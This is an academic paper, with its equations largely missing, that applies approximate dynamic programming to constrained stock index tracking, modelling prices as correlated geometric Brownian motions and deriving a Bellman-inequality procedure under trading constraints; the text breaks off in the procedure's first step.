] | {"ft_lang_label":"__label__en","ft_lang_prob":0.5431165,"math_prob":0.8046201,"size":3677,"snap":"2021-31-2021-39","text_gpt3_token_len":1635,"char_repetition_ratio":0.123332426,"word_repetition_ratio":0.007380074,"special_character_ratio":0.56758225,"punctuation_ratio":0.23344557,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99295723,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-21T23:13:04Z\",\"WARC-Record-ID\":\"<urn:uuid:349a15ee-6e34-43e0-b3e0-e7c3b2f19aa7>\",\"Content-Length\":\"36117\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a1691972-0856-4672-b8aa-9b1191913cfd>\",\"WARC-Concurrent-To\":\"<urn:uuid:77cb7f91-d6e6-452d-92e9-4273494eb919>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/50505d\",\"WARC-Payload-Digest\":\"sha1:FQCAQAGKONJGOP4VRAEO7JKGJZ6VTPIN\",\"WARC-Block-Digest\":\"sha1:U4GVTLN4EOWQU6VWSUKWJQZ67HQRU7NH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057274.97_warc_CC-MAIN-20210921221605-20210922011605-00319.warc.gz\"}"} |
https://1library.net/document/q77930kq-dimensional-synthesis-spatial-orientation-parallel-manipulator-characterizing-configuration.html | [
"# Dimensional Synthesis of a Spatial Orientation 3-DoF Parallel Manipulator by Characterizing the Configuration Space\n\nLoading....\n\nLoading....\n\nLoading....\n\nLoading....\n\nLoading....\n\n## Full text\n\n(1)\n\n### the Configuration Space\n\nM. Ur´ızar, V. Petuya, M. Diez, and A. Hern´andez\n\nAbstract In this paper the authors approach the dimensional synthesis of paral-lel manipulators focusing on the evaluation of important entities belonging to the configuration space, such as workspace and joint space. In particular, 3-DoF ma-nipulators that can perform non-singular transitions are considered, illustrating the procedure with a case study. The target is to search for designs that achieve the goals of adequate size and shape of the workspace.\n\nKey words: Parallel manipulator, Configuration space, Dimensional Synthesis.\n\n### 1 Introduction\n\nIn the design process of parallel manipulators several criteria have been presented in the literature for evaluating which architecture is best. Designers often search for the optimum design parameters such that certain important requirements are achieved. From the kinematic point of view, optimal design methodologies are principally focused on: workspace [6, 8, 2], kinematic performance indices [3, 1], task develop-ment , etc. Features such as workspace and dexterity can be emphasized as two significant considerations [5, 1], because parallel manipulators have relative smaller workspaces and complex singularities compared to their serial counterparts.\n\nThe analysis of the singularity loci, together with the distribution of the Di-rect Kinematic Problem (DKP) solutions over the workspace, has received a lot of attention during the last years. In this field, the phenomenon ofassembly mode change, also known asnon-singular solution change, has been extensively studied [11, 4, 10]. It consists in analyzing how the transitions between different DKP so-lutions can be made in a safety and controlled way. Manipulators presenting this\n\nM. Ur´ızar, V. Petuya, M. Diez and A. Hern´andez\n\nUniversity of the Basque Country, Faculty of Engineering in Bilbao, Mechanical Engineering Dpt. Alameda de Urquijo s/n, 48013 Bilbao (Spain), e-mail: [email protected]\n\n1\n\n## Author's version\n\n(2)\n\nability can enlarge their range of motion, as they have access to all the regions asso-ciated with the solutions involved in the transition. However, it must be emphasized that, usually, not all the designs of the same manipulator own this ability.\n\nIn this paper, the dimensional synthesis of this type of manipulators is ap-proached by characterizing entities of the configuration space, such as workspace and joint space. For three-degree-of-freedom parallel manipulators these entities that can be represented in a three-dimensional space. So as to show the procedure the spatial orientation 3-SPS-S parallel manipulator is used as an illustrative exam-ple. This manipulator has a broad range of applications, such as: orienting a tool or a workpiece, solar panels, space antennas, camera devices, human wrist prosthesis, haptic devices, etc. The purpose is to analyze several designs, assessing the influ-ence of the design parameters on the resultant workspace and joint space. Then, the aim is to search for the set of possible designs that best satisfy the requirements of size and shape of the operational workspace.\n\n### 2 Case study: 3-SPS-S parallel manipulator\n\nThe spatial orientation 3-SPS-S parallel manipulator shown in Fig. 1a will be stud-ied. 
The 3-SPS-S manipulator is made up of a moving platformOB1B2B3, a base platformOA1A2A3, and three extensible limbs denoted byli. Both platforms take the form of a tetrahedron, connected one to each other by a fixed spherical joint at point O. The robot has 3-DoF(φ,θ,ψ)defining the orientation of the moving platform.\n\n(a) (b)\n\nFig. 1: (a) Spatial 3-SPS-S parallel manipulator; (b) Design parameters of the mov-ing platform\n\n(3)\n\nWith respect to the base platform, the fixed spherical joints Ai are located on the principal axes of the fixed frameF{x,y,z}fulfilling|−→OAi|=R, fori=1,2,3. Besides, the spherical joints Bi are located with respect to the moving frame M{u,v,w}(see Fig. 1b) such that:\n\nMb 1=L[0,0,1]T (1) Mb 2=L[b2u,0,b2w]T Mb 3=L[b3u,b3v,b3w]T where b2u=cβ2; b2v=0; b2w=sβ2 (2) b3u=cβ3cγ3; b3v=cβ3sγ3; b3w=sβ3\n\nThe transformation from the moving frame M to the fixed frame F can be achieved by a 3×3 rotation matrixFMRdefined by the three Euler angles. In this case, the Euler angles(φ,θ,ψ)in theirwvwversion will be used.\n\nThe vectorFbi, or simplybi, expressed with respect to the fixed frameF is: bi= [bix,biy,biz]T=FM RMbi (3) On the other hand, the position vector of pointsAiwith respect to the fixed frame F isai= [aix,aiy,aiz]T.\n\nThe loop-closure equation for each limb isli=bi−ai, which results in the fol-lowing system fori=1,2,3:\n\nl2i =a2i +b2i−2aTibi (4)\n\n• Inverse Kinematic Problem: To solve the IKP, the Euler angles are established (φ,θ,ψ)and the length of each limblican be directly obtained from Eq. 4. Only the positive solution yields a physical meaning.\n\n• Direct Kinematic Problem: The DKP consists in solving the outputs(φ,θ,ψ)\n\nonce the three prismatic limb lengths are known. As demonstrated in this manipulator has a maximum of eight solutions to the DKP.\n\n### 2.1 Velocity Problem\n\nSo as to solve the velocity problem the loop-closure equations are differentiated with respect to time, obtaining:\n\nωp×bi=ωi×li+l˙i·si (5)\n\n(4)\n\nwheresiis defined as the unit vector directed fromAitoBi. The moving platform angular velocity is ωp, and ωi corresponds to the angular velocity of each limb li. Dot-premultiplying each term of the system (5) byli, the velocity equation ex-pressed in a matrix form is obtained as:\n\nJDKPωp =JIKPl˙i (6) where JDKP= (b1×l1)T (b2×l2)T (b3×l3)T ; JIKP= l1 0 0 0 l2 0 0 0 l3 (7)\n\nThe inverse Jacobian matrix,JIKP, is singular only whenever any of the prismatic limbs has zero length, which cannot be achieved in practice. Besides, each limb has only one associated working mode. Hence, we focus on the analysis of the DKP singularity locus in the configuration space.\n\n### 2.2 DKP Singularity Locus\n\nThe DKP singularity locus is obtained by computing the nullity of the determinant ofJDKP, which yields:\n\n|JDKP|=−R3L3·sθ·ξ (8)\n\nwhere\n\nξ =c2φcθ(b2w(b3usψ+b3vcψ)−b3w(b2usψ))−c2φsθ(b3vb2u) (9)\n\n+c2ψsθ(b2ub3v) +sθ(cψsψ(b2ub3u))−cθ(b2w(b3usψ+b3vcψ))\n\n+sφcφ(b2w(b3ucψ−b3vsψ)−b3wb2ucψ) Expression|JDKP|factorizes into three terms:\n\n• The constantR3L3does not affect the shape of the DKP singularity locus. Param-etersRandLdefine the size of the robot, and the minimum and maximum stroke of the prismatic limbs. For the example under study, without loss of generality, valuesR=1 andL=0.5 will be assigned.\n\n• The second term corresponds to the function:sθ. So as to avoid the singularity\n\nplanesθ=0 andθ=±π, the intervalθ∈(0,π)will be considered.\n\n• Finally, from Eq. 9 yields the expressionξ. 
This function depends on the output\n\nvariables (φ,θ,ψ), and on the geometric parameters(β2,γ3,β3). Therefore, the expression\n\n## Author's version\n\nξ will be assessed regarding the dimensional synthesis.\n\n(5)\n\n### 3 Dimensional Synthesis\n\nParameters(β2,γ3,β3)comprise the design parameters subject of study. Different designs will be analyzed, representing and assessing workspace and joint space en-tities.\n\n• Case 1: Similar Platforms\n\nThe first case under study establishes a design of the moving platform such that it is similar to the fixed base. For that, the geometric parameters are:β2=β3=0 and\n\nγ3=90◦. The expression of the DKP singularity locus, given by Eq. 9, yields:\n\nξ=sθ(cψ−cφ)(cψ+cφ) (10)\n\nIt is factorized into the functionsθ, and the product of two planes. These planes divide the workspace(φ,θ,ψ)into eight aspects, soVcase1=VT/8 beingVT the total volume. Each DKP solution lies inside each aspect, non-singular transitions being not possible. This is corroborated with the non-existence of cusp points inside any section of the joint space (see details in , chapter 10).\n\n• Case 2: JointsB2,B3onuv-plane\n\nThe second case under study locates joints B2andB3 on theuv-plane, such that\n\nβ2=β3=0 andγ3varies in the interval(0,90◦). The DKP singularity locus yields:\n\nξ=sθ[b3usψcψ+b3v(c2ψ−c2φ)] (11)\n\nYet again, expression ξ factorizes into the function sθ, and a trigonometric\n\nex-pression depending on outputs (φ,ψ) and coordinatesb3uandb3v, function of the geometric parameterγ3. Let us analyze a design included in Case 2, by assigning\n\nγ3=30◦. The DKP singularity locus is represented in the workspace in Fig. 2a, the joint space and its cross section forl1=const being depicted in Fig. 2b. Contrary to Case 1, only four aspects exist, so that the operational workspace is duplicated Vcase2=2Vcase1=VT/4, because the robot can move between solutions located in-side the same aspect. This is in accordance with the existence of cusp points in joint space sections, as shown in Fig. 2b.\n\nNon-singular transitions can be performed between regions in the workspace where different solutions lie, as for example regions 1 and 2 in the workspace section of Fig. 2c. Though the size of the workspace isVT/4 for all designs in Case 2, its shape varies. It is interesting to search for designs that yield a regular workspace, such that the range of motion of the output variables maintains over the entire workspace. As shown in Fig. 2c, the ratioH=h/rcan be measured and serves as an indicator of regularity. Its evolution depending onγ3is represented in Fig. 2d. It can be observed that small values ofγ3yield a more regular workspace (H≈1). The extreme valuesγ3=0 (planar moving platform) and γ3=90◦ con-stitute particular designs. On the one hand, γ3=0 yields a degeneracy design for which the workspace is formed by planes (H=1) and only 4 DKP solutions exist.\n\n## Author's version\n\n(6)\n\n(a) (b)\n\n(c) (d)\n\nFig. 2: Case 2: DKP singularity locus in the (a) workspace, (b) joint space and (c) workspace section;(d) Ratio of regularityH\n\nValueγ3=90◦coincides with Case 1, and verifiesH=0, no connection between different regions is possible.\n\n• Case 3: General Design\n\nThe last case corresponds to a general design of the moving platform. For this case the three dimensional parameters (β2,γ3,β3) can be assigned any value in the range (0,90◦). The singularity locus is given by expressionξ in Eq. (9), which is plotted in the workspace and joint space in Fig. 
3 for a specific design:β2=30◦,γ3=60◦and\n\nβ3=30◦. Some sections of the joint space are also depicted in Fig. 3b, visualizing the existence of cusp points.\n\nThese designs present two aspects, the holes of the singularity surface in the workspace (Fig. 3a) allowing the connection between all solutions having the same sign of|JDKP|. Consequently, the designs of Case 3 exhibit the maximum opera-tional workspace:Vcase3=VT/2. Nevertheless, the shape that the singularity surface acquires in the workspace, and in the joint space, is much more complex.\n\n(7)\n\n(a) (b)\n\n(c) (d)\n\nFig. 3: Case 3: DKP singularity locus in the (a) workspace and (b) joint space; Design parameter space according to indicators (c)R1and (d)R2\n\nIn this sense, similarly to Case 2, some indicators that characterize the shape of the operational workspace can be implemented. Then, parameters (β2,γ3,β3) com-prise thedesign parameter spacein which each point represents a possible design, and has an associated value according to the indicator under evaluation. We propose two indicators. The first,R1, evaluates the regularity, comparing the number of nodes forming the DKP singularity curves among different sections ofθi∈(0,π). The sec-ond indicator,R2, assesses the quality of the curves in eachθisection, penalizing the designs for which the curves cover a larger region. The results are displayed in Figs. 3c and 3d, the blue colored points indicate the geometric parameters corresponding to optimum designs, and the red ones the worst (see details in ).\n\nThe optimum design parameter space can be computed by intersecting the op-timum values of both graphs in Figs. 3c and 3d. Then, any point belonging to the resultant optimum space constitutes a valid design complying with the established requirements. For example, the following design:β2=15◦,γ3=10◦andβ3=20◦ is an optimum design with regular workspace, maintaining a similar pattern of the singularity curves in different sections of the workspace.\n\n(8)\n\n### 4 Conclusions\n\nDimensional synthesis of a spatial orientation manipulator has been approached, fo-cusing mainly on the configuration space entities. Analyzing different designs, it has been shown that the ones capable of transitioning between solutions exhibit a larger workspace. Not only the size of the operational workspace but the evaluation of its shape has been also considered, representing the design parameter space according to the different requirements. Then the designer can choose any point belonging to the set of optimum values achieved. The proposed procedure is valid for 3-DoF planar or spatial parallel manipulators that exhibit the transitioning ability.\n\n### Acknowledgment\n\nThe authors wish to acknowledge the financial support received from Ministerio de Econom´ıa y Competitividad (Project DPI2011- 22955), the European Union (Project FP7-CIP-ICT-PSP-2009-3) and Basque Government, Dpto. Educ., Univ. e Investig. (Project IT445-10) and UPV/EHU under program UFI 11/29.\n\n### References\n\n1. Altuzarra, O., Pinto, C., Sandru, B., Hern´andez, A.: Optimal Dimensioning for Parallel Ma-nipulators: Workspace, Dexterity and Energy. ASME Journal of Mechanical Design133(4), 041,007–7 (2011)\n\n2. Bonev, I., Rhyu, J.: A geometrical method for computing the constant-orientation workspace of 6-PRRS parallel manipulators. Mechanism and Machine Theory36, 1–13 (2001) 3. Gosselin, C., Angeles, J.: A global performance index for the kinematic optimization of\n\nrobotic manipulators. 
Journal of Mechanical Design 113(3), 220–226 (1991)

4. Husty, M.: Non-singular assembly mode change in 3-RPR parallel manipulators. In: Computational Kinematics (Eds. Kecskeméthy, A., Müller, A.), Springer (2009)

5. Liu, X.J., Guan, L., Wang, J.: Kinematics and Closed Optimal Design of a Kind of PRRRP Parallel Manipulator. ASME Journal of Mechanical Design 129(5), 558–563 (2007)

6. Merlet, J.P.: Designing a parallel manipulator for a specific workspace. International Journal of Robotics Research 16(4), 545–556 (1997)

7. Monsarrat, B., Gosselin, C.: Workspace Analysis and Optimal Design of a 3-Leg 6-DOF Parallel Platform Mechanism. IEEE Trans. on Robotics and Automation 19(6), 954–966 (2003)

8. Ottaviano, E., Ceccarelli, M.: An Analytical Design for CaPaMan with Prescribed Position and Orientation. In: Proc. of the ASME Design Engineering Technical Conference and Computers and Information in Engineering Conference, Baltimore (2000)

9. Urízar, M.: Methodology to Enlarge the Workspace of Parallel Manipulators by Means of Non-singular Transitions. Ph.D. thesis, University of the Basque Country (UPV/EHU). http://www.ehu.es/compmech/members/monica-urizar/research/ (2012)

10. Urízar, M., Petuya, V., Altuzarra, O., Hernández, A.: Assembly Mode Changing in the Cuspidal Analytic 3-RPR. IEEE Transactions on Robotics 28(2), 506–513 (2012)

11. Zein, M., Wenger, P., Chablat, D.: Non-singular assembly mode changing motions for 3-RPR parallel manipulators. Mechanism and Machine Theory 43(4), 480–490 (2008)
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8269957,"math_prob":0.92485464,"size":15169,"snap":"2021-04-2021-17","text_gpt3_token_len":4084,"char_repetition_ratio":0.139334,"word_repetition_ratio":0.014838129,"special_character_ratio":0.23646912,"punctuation_ratio":0.15636486,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9537152,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-23T01:57:20Z\",\"WARC-Record-ID\":\"<urn:uuid:cf294129-e57b-4e03-bd4e-720d5fdf3985>\",\"Content-Length\":\"225995\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:89947313-034b-4baa-a222-199417ca7cb8>\",\"WARC-Concurrent-To\":\"<urn:uuid:ba81e3eb-7e59-42fa-ba99-ab8771fffc80>\",\"WARC-IP-Address\":\"138.197.149.215\",\"WARC-Target-URI\":\"https://1library.net/document/q77930kq-dimensional-synthesis-spatial-orientation-parallel-manipulator-characterizing-configuration.html\",\"WARC-Payload-Digest\":\"sha1:7AXRTMWCCNA34EZB7DQ7N7UZGN2M6XDS\",\"WARC-Block-Digest\":\"sha1:ROWBBM6JC2O656IWCFVOH2ME3U7HBFHN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618039626288.96_warc_CC-MAIN-20210423011010-20210423041010-00178.warc.gz\"}"} |
http://oak.go.kr/central/journallist/journaldetail.do?article_seq=12335 | [
"Approximate Dynamic Programming-Based Dynamic Portfolio Optimization for Constrained Index Tracking\n\n•",
null,
"• ABSTRACT\n\nRecently, the constrained index tracking problem, in which the task of trading a set of stocks is performed so as to closely follow an index value under some constraints, has often been considered as an important application domain for control theory. Because this problem can be conveniently viewed and formulated as an optimal decision-making problem in a highly uncertain and stochastic environment, approaches based on stochastic optimal control methods are particularly pertinent. Since stochastic optimal control problems cannot be solved exactly except in very simple cases, approximations are required in most practical problems to obtain good suboptimal policies. In this paper, we present a procedure for finding a suboptimal solution to the constrained index tracking problem based on approximate dynamic programming. Illustrative simulation results show that this procedure works well when applied to a set of real financial market data.\n\n• KEYWORD\n\nApproximate dynamic programming , Dynamic portfolio optimization , Stochastic control , Constrained index tracking , Financial engineering\n\n• 1. Introduction\n\nRecently, a large class of financial engineering problems dealing with index tracking and portfolio optimization have been considered as an important application domain for several types of engineering and applied mathematics principles [1-8]. Because this class can be conveniently viewed and formulated as an optimal decision-making problem in a highly uncertain and stochastic environment, particularly pertinent to this problem are approaches based on stochastic optimal control methods. The stock index tracking problem is concerned with constructing a stock portfolio that mimics or closely tracks the returns of a stock index such as the S&P 500. Stock index tracking is of practical importance since it is one of the important methods used in a passive approach to equity portfolio management and to index fund management. To minimize tracking error against the target index, usually full replication, in which the stocks are held according to their own weights in the index, or quasi-full replication is adopted by the fund managers. An exchange traded fund (ETF) is a good example of such portfolio management since it is constructed according to its own portfolio deposit file (PDF). Such a full replication or quasi-full replication can be very costly owing to transaction and fund administration costs. The constrained index tracking considered in this paper is concerned with tracking a stock index by investing in only a subset of the stocks in the target index under some constraints. Because it uses only a subset of the stocks and is expected to dramatically reduce the management costs involved in index tracking and simplify portfolio rebalancing more effectively, this problem is particularly important to portfolio managers . Successfully constrained index tracking is also expected to increase the liquidity of an ETF since we may be able to construct the same ETF without investing in the same quantity of stocks in its PDF. To achieve good tracking performance with a subset of stocks in the index, several methods (e.g., control theory [1,4], use of genetic algorithms , and evolutionary methods ) have been studied by researchers.\n\nIn this paper, we consider the use of approximate dynamic programming (ADP) for solving the constrained index tracking problem. Recently, the use of ADP methods has become popular in the area of stochastic control [9-12]. 
As is well known, solutions of stochastic optimal control problems can be characterized by dynamic programming (DP) [9,10]. However, stochastic control problems cannot be solved by DP exactly except in very simple cases, and to obtain good suboptimal policies, many studies rely on ADP methods. ADP methods have been successfully applied to many real-world problems , including some financial engineering problems such as portfolio optimization [5,11,12]. The main objective of this paper is to extend the use of ADP to the field of index tracking. More specifically, we (slightly) modify a mathematical formulation of the constrained index tracking problem in [1,4] and establish an ADP-based procedure for solving the resultant stochastic state-space control formulation. Simulation results show that this procedure works well when applied to real financial market data.

The remainder of this paper is organized as follows: In Section 2, preliminaries are provided regarding constrained index tracking and ADP. In Section 3, we describe our main results on an ADP-based control procedure for the constrained index tracking problem. In Section 4, the effectiveness of the ADP-based procedure is illustrated using real financial market data. Finally, in Section 5, concluding remarks are presented.

2. Preliminaries

In this paper, we examine constrained index tracking based on ADP. In the following, we describe some fundamentals regarding constrained index tracking and ADP.

2.1 Constrained Index Tracking Problem

In this section, we describe a constrained index tracking problem [1,4], in which an index of stocks is tracked with a subset of these stocks under certain constraints, as a stochastic control problem. We consider the index I(t) defined as a weighted average of n stock prices, s1(t), · · · , sn(t). Note that the stock prices are generally modeled as correlated geometric Brownian motions [1,14] (Eq. (1)), where μi is the drift of the ith stock and the driving noise is a vector Brownian motion.

By performing discretization using the Euler method with time step Δt, one can transform Eq. (1) into a discrete-time asset dynamics equation. With s(t) ≜ [s1(t), · · · , sn(t)]ᵀ, the index value defined by a weighted average can be expressed as I(t) = αᵀs(t) for some α ∈ Rⁿ satisfying αi ≥ 0, ∀i ∈ {1, · · · , n}, and Σi αi = 1. Without loss of generality, in this paper we assume α = (1/n)1, i.e., the index I(t) is assumed to be the equally weighted average of the stock prices; extending the results of this paper to a general α case is straightforward.

The continuous dynamics of the risk-free asset (e.g., the continuous-time bond) can be modeled by an exponential-growth equation with risk-free rate rf; when the time step is Δt, its discretized version can be written in the corresponding difference form. We assume that the money amounts of the first m < n stocks, y1(t), · · · , ym(t), and the amount of the risk-free asset, yC(t), constitute our portfolio vector y(t) = [y1(t), · · · , ym(t); yC(t)]ᵀ at time t.

Note that it is the total value of this portfolio vector that should track the index value over time. More precisely, our goal is to let the wealth of our portfolio, w(t) = 1ᵀy(t), approach sufficiently close to the index value I(t) = αᵀs(t) as t → ∞ by performing appropriate trades, u1(t), · · · , um(t) and uC(t), for the first m stocks and the risk-free asset, respectively, at the beginning of each time step t.
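To make this discretization step concrete, here is a minimal NumPy sketch of Euler-discretized correlated geometric Brownian motions (illustrative only, not the authors' code; the drift vector `mu`, covariance `Sigma`, step `dt` and seed are made-up placeholder values):

```python
import numpy as np

# Hypothetical parameters: 3 stocks, daily time step.
mu = np.array([0.08, 0.05, 0.10])          # drift per year
Sigma = np.array([[0.040, 0.006, 0.010],
                  [0.006, 0.025, 0.004],
                  [0.010, 0.004, 0.060]])  # noise covariance per year
dt = 1.0 / 250.0                           # one trading day
T = 250                                    # number of steps

rng = np.random.default_rng(0)
L = np.linalg.cholesky(Sigma)              # produces correlated increments

s = np.ones((T + 1, 3))                    # normalized prices, s_i(0) = 1
for t in range(T):
    dB = L @ rng.standard_normal(3) * np.sqrt(dt)  # correlated Brownian increment
    # Euler step for geometric Brownian motion: ds_i = s_i * (mu_i * dt + dB_i)
    s[t + 1] = s[t] * (1.0 + mu * dt + dB)

index = s.mean(axis=1)                     # equally weighted index I(t)
```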
Hence, a solution to the constrained index tracking problem can be found by considering the optimization problem of Eq. (5), where γ ∈ (0, 1) is a discount factor, dist(a, b) is the distance between a and b, and Ct is a constraint set. Details about the distance function dist(a, b) and the constraint set Ct are presented in Section 3.

2.2 Approximate Dynamic Programming

Dynamic programming (DP) is a branch of control theory concerned with finding the optimal control policy that can minimize costs in interactions with an environment. DP is one of the most important theoretical tools in the study of stochastic control. A variety of topics on DP and stochastic control have been well addressed in [9-12]. In the following, some fundamental concepts on stochastic control and DP are briefly summarized. For more details, see, e.g., . A large class of stochastic control problems deal with dynamics described by the state equation

x(t + 1) = f(x(t), u(t), w(t)),

where x(t) ∈ X is the state vector, u(t) ∈ U is the control input vector, and w(t) ∈ W is the process noise vector. Here, the noise vectors w(t) are generally assumed to be independent and identically distributed (IID). Many stochastic control problems are concerned with finding a time-invariant state-feedback control policy φ : X → U that can optimize a performance index function. A widely used choice of performance index for infinite-horizon stochastic optimal control problems is the expected sum of discounted stage costs, i.e.,

J = E[ Σ_{t=0}^{∞} γᵗ ℓ(x(t), u(t)) ],

where ℓ(·, ·) is the stage cost function. By minimizing this performance index over all admissible control policies φ : X → U, one can find the optimal value of J. This minimal performance index value is denoted by J*, and an optimal state-feedback function achieving the minimal value is denoted by φ*. The state value function V*(z) is defined as the optimal performance index value conditioned on the initial state x(0) = z.

According to optimal control theory [9,10], the state value function V* : X → R is the unique fixed point of the Bellman equation

V*(z) = min_{v ∈ U} E[ ℓ(z, v) + γ V*(f(z, v, w)) ],

and an optimal control policy φ* : X → U can be found by taking, for each z, an input v that achieves the minimum. In operator form, the Bellman equation can be written as V* = T V*, where T is the operator (whose domain and codomain are both function spaces mapping X into R ∪ {∞}) defined as

(T V)(z) = min_{v ∈ U} E[ ℓ(z, v) + γ V(f(z, v, w)) ]

for any V : X → R ∪ {∞}. The operator T for the Bellman equation is called the Bellman operator (see, e.g., ). As is well known, the state value function V* and the corresponding optimal control policy φ* cannot be found exactly except in simple special cases [9,11]. An efficient strategy when finding the exact state value function is impossible is to rely on an approximate state value function V̂. By applying this strategy to Eq. (20), one can find a suboptimal control policy φadp : X → U via the same minimization with V̂ in place of V*. In this paper, we apply this ADP strategy to the constrained index tracking problem.

In this section, we describe constrained index tracking in the framework of a stochastic state-space control problem, and we present an ADP-based procedure to find a suboptimal solution to the problem. To express the constrained index tracking problem in a state-space optimal control format, we need to define the control input and state vector together with the performance index that is used as an optimization criterion. The control input we consider for the constrained index tracking problem is a vector of trades, u(t) = [u1(t), · · · , um(t); uC(t)]ᵀ, executed for the portfolio y(t) ≜ [y1(t), · · · , ym(t); yC(t)]ᵀ at the beginning of each time step t.
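The paper's state space is continuous, so V* can only be approximated; on a toy finite MDP, however, the fixed-point property V* = T V* can be demonstrated exactly. The sketch below is illustrative only — the stage costs `ell` and the transition tensor `P` are invented — and simply applies the Bellman operator until convergence (value iteration):

```python
import numpy as np

gamma = 0.9
n_states, n_actions = 3, 2
# Hypothetical stage costs ell[x, u] and transition probabilities P[u][x, x'].
ell = np.array([[1.0, 4.0], [2.0, 0.5], [0.0, 3.0]])
P = np.array([[[0.8, 0.2, 0.0], [0.1, 0.6, 0.3], [0.0, 0.3, 0.7]],
              [[0.5, 0.5, 0.0], [0.0, 0.9, 0.1], [0.2, 0.2, 0.6]]])

V = np.zeros(n_states)
for _ in range(500):                          # value iteration: V <- T V
    Q = ell + gamma * np.einsum('uxy,y->xu', P, V)
    V_new = Q.min(axis=1)                     # Bellman operator applied to V
    if np.max(np.abs(V_new - V)) < 1e-10:
        break
    V = V_new
policy = Q.argmin(axis=1)                     # greedy policy, Eq.-(20)-style argmin
```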
Note that ui(t) represents buying or selling assets. That is, by ui(t) ≥ 0 we mean buying the asset associated with yi(t), and by ui(t) ≤ 0 we mean selling it. For a state-space description of the constrained index tracking problem, we define the state vector as x(t) ≜ [sᵀ(t), yᵀ(t)]ᵀ. With these state and input definitions, the state transition of Eq. (14) can be described by a discrete-time state equation. As in , we assume that our stock prices are all normalized in the sense that initially they start from s1(0) = · · · = sn(0) = 1.

A commonly used distance function for index tracking is the squared tracking error , i.e., dist(I(t), w(t)) = (I(t) − w(t))². Note that in this performance index function, both I(t) and w(t) are defined by means of the entries of the state vector x(t). For the initial portfolio, we take y(0) = [0, · · · , 0, 1]ᵀ, which means that the tracking portfolio starts from the all-cash initial condition with a unit magnitude. With the above state-space description, the problem of optimally tracking the index I(t) with the wealth of the tracking portfolio, w(t) = 1ᵀy(t), over the infinite horizon can be expressed as an optimization problem of the form of Eq. (5).

In solving this index tracking problem, the tracking portfolio y(t) and the control input u(t) should satisfy certain constraints that arise naturally (e.g., no short selling or no overweighting in a certain sector [1,4]). The first constraint we consider in this paper is the so-called self-financing condition, 1ᵀu(t) = 0, which means that the total money obtained from selling should be equal to the total money required for buying. Next, we impose a nonnegativity (i.e., long-only) condition on our tracking portfolio, i.e., yi(t) ≥ 0 for ∀i ∈ {1, · · · , m}, ∀t ∈ {0, 1, · · · }. As a final set of constraints, we consider allocation upper bounds, where the κi are fixed positive constants less than 1. By constraint #3, we mean that the fraction of the wealth invested in the m risky assets (i.e., stocks) should not be larger than κ1. Also, constraint #4 sets a similar upper bound on specific stocks belonging to the set J. From these steps, the constrained index-tracking problem can now be expressed as a stochastic control problem, where I(t) = (1/n)1ᵀs(t), w(t) = 1ᵀy(t), and x(t) = [sᵀ(t), yᵀ(t)]ᵀ. Note that this formulation is a (slight) modification of the one used in [1,4], and the state vector x(t) here contains (slightly) richer information compared to the original one [1,4], which uses the stock prices and the total wealth of the tracking portfolio only.

To solve the above constrained index tracking problem via ADP, we utilize the iterated-Bellman-inequality strategy proposed by Wang, O'Donoghue, and Boyd [11,12]. In the iterated-Bellman-inequality strategy, convex quadratic functions V̂i(z) = zᵀPi z + 2pᵀi z + qi are used for approximating state value functions, and letting the parameters (Pi, pi, qi) satisfy a series of Bellman inequalities guarantees that the resulting approximation is a lower bound of the optimal state value function V* [11,12].

In this paper, we obtain an ADP-based solution procedure for the constrained index tracking problem utilizing the iterated-Bellman-inequality strategy [11,12]. To compute the stage cost, we note that since the initial stock prices and the initial cash amount are both normalized (i.e., s1(0) = · · · = sn(0) = 1 and yC(0) = 1), the initial tracking error I(0) − w(0) is equal to zero. Hence, the performance index can be equivalently rewritten, and for simplicity and convenience we use the first term on the right-hand side of Eq.
(39) as our new performance index function. Now we consider the tracking error at time t + 1 conditioned on x(t) = z and u(t) = v. For notational convenience, we let z ≜ [sᵀ, yᵀ]ᵀ, and we define sa ≜ [s1, · · · , sm]ᵀ, sb ≜ [sm+1, · · · , sn]ᵀ, ya ≜ [y1, · · · , ym]ᵀ, and va ≜ [v1, · · · , vm]ᵀ. With these definitions, the tracking error I(t + 1) − w(t + 1) conditioned on x(t) = z and u(t) = v satisfies an explicit equality. Based on this equality, one can obtain an expression for the stage cost, i.e., the expectation of the squared tracking error at time step (t + 1) conditioned on x(t) = z and u(t) = v, where the μi and the Σij are the block components of μ and Σ, respectively.

Now we let the derived matrix variables Gi, i = 1, · · · , M, satisfy the relation defining them via the expectation on the right-hand side. Then, by evaluating the right-hand side of Eq. (47), we obtain the expression of Eq. (49), where the Pi,jk and the pi,j are the block components of Pi and pi, respectively, and ⊙ denotes the elementwise product.

Note that the constraints considered in this paper are all linear. Hence, the left-hand sides of our constraints can be expressed in the affine form E z + F v. More specifically, the first constraint can be written with E(1) = 1_{1×(m+1)} and F(1) = 0_{1×(n+m+1)}. Further, the linear inequality constraints can be given in a similar form, where, in Eq. (54), the allocation constraint set J is described by {j1, · · · , j|J|}, |J| being the number of entries in J, and ej denotes the jth column of the identity matrix Im. With all these constraints required of the input-state pair (v, z), the resultant constrained Bellman inequality condition becomes the following: whenever (v, z) satisfies the stated linear constraints, the corresponding Bellman inequality must hold, where Si is the derived matrix variable defined in Eq. (57). Finally, a sufficient condition for this constrained Bellman inequality requirement can be obtained using the S-procedure, with S-procedure multipliers of appropriate dimensions.

By combining all the above steps, the process of finding a suboptimal ADP solution to the constrained index tracking problem can be summarized as follows:

[Procedure]

Preliminary steps:

1. Choose the discount rate γ and the allocation upper bounds κ1 and κ2.

